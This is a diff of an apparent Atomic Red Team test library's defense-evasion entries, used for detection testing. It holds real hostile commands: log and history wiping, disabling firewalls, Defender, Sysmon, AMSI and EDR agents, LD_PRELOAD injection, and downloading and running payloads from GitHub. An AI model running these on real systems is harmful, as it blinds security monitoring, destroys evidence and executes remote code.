supported_platforms: - linux - macos 
@@ -22536,13 +22536,13 @@ defense-evasion: keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog - ' +' supported_platforms: - linux dependencies: - description: 'Install sshpass and create user account used for excuting - ' +' prereq_command: "$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)\n" get_prereq_command: | @@ -22552,35 +22552,35 @@ defense-evasion: executor: command: 'sshpass -p ''pwd101!'' ssh testuser1@localhost -T hostname - ' +' cleanup_command: 'userdel -f testuser1 - ' +' name: sh - name: Prevent Powershell History Logging auto_generated_guid: 2f898b81-3e97-4abb-bc3f-a95138988370 description: 'Prevents Powershell history - ' +' supported_platforms: - windows executor: command: 'Set-PSReadlineOption –HistorySaveStyle SaveNothing - ' +' name: powershell cleanup_command: Set-PSReadLineOption -HistorySaveStyle SaveIncrementally - name: Clear Powershell History by Deleting History File auto_generated_guid: da75ae8d-26d6-4483-b0fe-700e4df4f037 description: 'Clears Powershell history - ' +' supported_platforms: - windows executor: command: 'Remove-Item (Get-PSReadlineOption).HistorySavePath - ' +' name: powershell T1070.002: technique: @@ -22631,7 +22631,7 @@ defense-evasion: auto_generated_guid: 989cc1b1-3642-4260-a809-54f9dd559683 description: 'Delete system and audit logs - ' +' supported_platforms: - macos - linux @@ -22647,7 +22647,7 @@ defense-evasion: This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -22658,14 +22658,14 @@ defense-evasion: executor: command: 'echo 0> /var/spool/mail/#{username} - ' +' name: bash - name: Overwrite Linux Log auto_generated_guid: d304b2dc-90b4-4465-a650-16ddd503f7b5 description: 'This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: 
@@ -22676,7 +22676,7 @@ defense-evasion: executor: command: 'echo 0> #{log_path} - ' +' name: bash T1070.001: technique: @@ -22744,7 +22744,7 @@ defense-evasion: System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty. - ' +' supported_platforms: - windows input_arguments: @@ -22755,7 +22755,7 @@ defense-evasion: executor: command: 'wevtutil cl #{log_name} - ' +' name: command_prompt elevation_required: true - name: Delete System Logs Using Clear-EventLog @@ -22784,7 +22784,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -22794,7 +22794,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -22865,7 +22865,7 @@ defense-evasion: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -22900,20 +22900,20 @@ defense-evasion: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1553.002: technique: external_references: 
@@ -23160,10 +23160,10 @@ defense-evasion: dependencies: - description: 'C# file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}" @@ -23171,10 +23171,10 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Dynamic C# Compile auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef @@ -23196,24 +23196,24 @@ defense-evasion: dependencies: - description: 'exe file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file} - ' +' executor: command: 'Invoke-Expression #{input_file} - ' +' name: powershell - name: C compile auto_generated_guid: d0377aa6-850a-42b2-95f0-de558d80be57 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23226,14 +23226,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | gcc #{input_file} && ./a.out 
@@ -23243,7 +23243,7 @@ defense-evasion: auto_generated_guid: da97bb11-d6d0-4fc1-b445-e443d1346efe description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23256,14 +23256,14 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: | g++ #{input_file} && ./a.out @@ -23273,7 +23273,7 @@ defense-evasion: auto_generated_guid: 78bd3fa7-773c-449e-a978-dc1f1500bc52 description: 'Compile a c file with either gcc or clang on Linux or Macos. - ' +' supported_platforms: - linux - macos @@ -23286,18 +23286,18 @@ defense-evasion: dependencies: - description: 'the source file must exist on disk at specified location (#{input_file}) - ' +' prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/T1027-004-test.c -OutFile #{input_file} - ' +' executor: command: 'go run #{input_file} - ' +' name: bash T1218.001: technique: 
@@ -23377,17 +23377,17 @@ defense-evasion: dependencies: - description: 'The payload must exist on disk at specified location (#{local_chm_file}) - ' +' prereq_command: 'if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}" executor: command: 'hh.exe #{local_chm_file} - ' +' name: command_prompt - name: Compiled HTML Help Remote Payload auto_generated_guid: 0f8af516-9818-4172-922b-42986ef1e81d @@ -23404,7 +23404,7 @@ defense-evasion: executor: command: 'hh.exe #{remote_chm_file} - ' +' name: command_prompt - name: Invoke CHM with default Shortcut Command Execution auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7 @@ -23430,7 +23430,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23463,7 +23463,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}' @@ -23488,7 +23488,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}' name: powershell @@ -23529,7 +23529,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath 
@@ -23568,7 +23568,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath @@ -23721,17 +23721,17 @@ defense-evasion: dependencies: - description: 'Cpl file must exist on disk at specified location (#{cpl_file_path}) - ' +' prereq_command: 'if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.002/bin/calc.cpl" -OutFile "#{cpl_file_path}" executor: command: 'control.exe #{cpl_file_path} - ' +' name: command_prompt T1578.002: technique: @@ -24082,10 +24082,10 @@ defense-evasion: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -24093,7 +24093,7 @@ defense-evasion: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -24213,7 +24213,7 @@ defense-evasion: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -24224,10 +24224,10 @@ defense-evasion: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1578.003: 
@@ -24366,7 +24366,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -24389,7 +24389,7 @@ defense-evasion: description: 'Use Python to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24405,13 +24405,13 @@ defense-evasion: dependencies: - description: 'Python must be present - ' +' prereq_command: 'which python3 - ' +' get_prereq_command: 'echo "Please install Python 3" - ' +' executor: name: sh elevation_required: false @@ -24428,7 +24428,7 @@ defense-evasion: description: 'Use Perl to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24444,13 +24444,13 @@ defense-evasion: dependencies: - description: 'Perl must be present - ' +' prereq_command: 'which perl - ' +' get_prereq_command: 'echo "Please install Perl" - ' +' executor: name: sh elevation_required: false @@ -24464,7 +24464,7 @@ defense-evasion: description: 'Use common shell utilities to decode a base64-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24495,7 +24495,7 @@ defense-evasion: description: 'Use common shell utilities to decode a hex-encoded text string and echo it to the console - ' +' supported_platforms: - linux - macos @@ -24511,13 +24511,13 @@ defense-evasion: dependencies: - description: 'xxd must be present - ' +' prereq_command: 'which xxd - ' +' get_prereq_command: 'echo "Please install xxd" - ' +' executor: name: sh elevation_required: false @@ -24750,7 +24750,7 @@ defense-evasion: description: 'Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail - ' +' supported_platforms: - iaas:aws input_arguments: 
@@ -24769,7 +24769,7 @@ defense-evasion: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: | cat ~/.aws/credentials | grep "default" aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} @@ -24777,7 +24777,7 @@ defense-evasion: get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: | aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} @@ -24884,7 +24884,7 @@ defense-evasion: command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: | if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){ C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null @@ -24959,10 +24959,10 @@ defense-evasion: executor: command: 'wevtutil sl "#{log_name}" /e:false - ' +' cleanup_command: 'wevtutil sl "#{log_name}" /e:true - ' +' name: command_prompt T1562.007: technique: @@ -25062,10 +25062,10 @@ defense-evasion: executor: command: 'netsh advfirewall set currentprofile state off - ' +' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 - ' +' name: command_prompt - name: Disable Microsoft Defender Firewall via Registry auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 @@ -25078,11 +25078,11 @@ defense-evasion: command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f - ' +' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 
@@ -25097,7 +25097,7 @@ defense-evasion: netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes cleanup_command: 'netsh advfirewall reset >nul 2>&1 - ' +' name: command_prompt - name: Opening ports for proxy - HARDRAIN auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80 @@ -25156,27 +25156,27 @@ defense-evasion: auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a description: 'Stop the Uncomplicated Firewall (UFW) if installed. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw disable - ' +' cleanup_command: | ufw enable ufw status verbose @@ -25190,7 +25190,7 @@ defense-evasion: dependencies: - description: 'Check if systemctl and ufw is installed on the machine. - ' +' prereq_command: "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; @@ -25198,13 +25198,13 @@ defense-evasion: ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'systemctl stop ufw - ' +' cleanup_command: | systemctl start ufw systemctl status ufw 
@@ -25217,20 +25217,20 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'ufw logging off - ' +' cleanup_command: | ufw logging low ufw status verbose @@ -25244,14 +25244,14 @@ defense-evasion: dependencies: - description: 'Check if ufw is installed on the machine and enabled. - ' +' prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n" get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25265,21 +25265,21 @@ defense-evasion: auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'Check if /etc/ufw/user.rules exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25288,7 +25288,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/ufw/user.rules cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules - ' +' - name: Edit UFW firewall ufw.conf file auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf 
@@ -25299,14 +25299,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/ufw.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25326,14 +25326,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/ufw/sysctl.conf exists. - ' +' prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25353,14 +25353,14 @@ defense-evasion: dependencies: - description: 'Check if /etc/default/ufw exists. - ' +' prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -25369,7 +25369,7 @@ defense-evasion: grep "# THIS IS A COMMENT" /etc/default/ufw cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw - ' +' - name: Tail the UFW firewall log file auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27 description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log @@ -25380,20 +25380,20 @@ defense-evasion: dependencies: - description: 'Check if /var/log/ufw.log exists. - ' +' prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true command: 'tail /var/log/ufw.log - ' +' cleanup_command: '' T1562.001: technique: @@ -25458,7 +25458,7 @@ defense-evasion: auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 description: 'Disables syslog collection - ' +' supported_platforms: - linux input_arguments: 
@@ -25487,11 +25487,11 @@ defense-evasion: dependencies: - description: 'Package with rsyslog must be on system - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: "#{flavor_command}\n" @@ -25502,7 +25502,7 @@ defense-evasion: auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: @@ -25520,23 +25520,23 @@ defense-evasion: auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8 description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: command: 'setenforce 0 - ' +' cleanup_command: 'setenforce 1 - ' +' name: sh elevation_required: true - name: Stop Crowdstrike Falcon on Linux auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d description: 'Stop and disable Crowdstrike Falcon on Linux - ' +' supported_platforms: - linux executor: @@ -25552,7 +25552,7 @@ defense-evasion: auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: 
@@ -25568,48 +25568,48 @@ defense-evasion: auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' name: sh elevation_required: true - name: Disable OpenDNS Umbrella auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849 description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' name: sh elevation_required: true - name: Disable macOS Gatekeeper auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053 description: 'Disables macOS Gatekeeper - ' +' supported_platforms: - macos executor: command: 'sudo spctl --master-disable - ' +' cleanup_command: 'sudo spctl --master-enable - ' +' name: sh elevation_required: true - name: Stop and unload Crowdstrike Falcon on macOS @@ -25617,7 +25617,7 @@ defense-evasion: description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS - ' +' supported_platforms: - macos input_arguments: 
@@ -25655,40 +25655,40 @@ defense-evasion: dependencies: - description: 'Sysmon must be downloaded - ' +' prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip" Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force Remove-Item $env:TEMP\Sysmon.zip -Force - description: 'sysmon must be Installed - ' +' prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else { Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i} - description: 'sysmon filter must be loaded - ' +' prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | sysmon -u sysmon -accepteula -i executor: command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sysmon -u -i > nul 2>&1 sysmon -i -accepteula -i > nul 2>&1 @@ -25700,7 +25700,7 @@ defense-evasion: auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: @@ -25713,10 +25713,10 @@ defense-evasion: dependencies: - description: 'Sysmon executable must be available - ' +' prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null 
@@ -25725,20 +25725,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed - ' +' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} - ' +' get_prereq_command: 'cmd /c sysmon -i -accepteula - ' +' executor: command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -25766,11 +25766,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null - ' +' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -25844,11 +25844,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 - ' +' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 - ' +' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -25888,7 +25888,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - ' +' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -25898,7 +25898,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. - ' +' supported_platforms: - windows input_arguments: @@ -25919,7 +25919,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. - ' +' supported_platforms: - windows input_arguments: 
@@ -26006,23 +26006,23 @@ defense-evasion: description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization. - ' +' supported_platforms: - office-365 input_arguments: username: description: office-365 username type: String - default: + default: password: description: office-365 password type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'ExchangeOnlineManagement PowerShell module must be installed - ' +' prereq_command: | $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable if (-not $RequiredModule) {exit 1} @@ -26380,13 +26380,13 @@ defense-evasion: Provider to be federated must be configured (outside of the scope of this test). - ' +' prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureADPreview -Force - ' +' executor: command: | Import-Module AzureADPreview @@ -26700,21 +26700,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD 
@@ -26739,18 +26739,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1055.001: technique: @@ -26850,10 +26850,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -27327,7 +27327,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory - ' +' supported_platforms: - linux - macos @@ -27339,14 +27339,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} - ' +' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it - ' +' supported_platforms: - linux - macos @@ -27358,14 +27358,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} - ' +' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it - ' +' supported_platforms: - linux input_arguments: 
@@ -27376,7 +27376,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} - ' +' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -27396,17 +27396,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} - ' +' executor: command: 'del /f #{file_to_delete} - ' +' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -27426,17 +27426,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) - ' +' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'mkdir #{folder_to_delete} - ' +' executor: command: 'rmdir /s /q #{folder_to_delete} - ' +' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -27444,7 +27444,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. - ' +' supported_platforms: - windows input_arguments: @@ -27458,17 +27458,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) - ' +' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} - ' 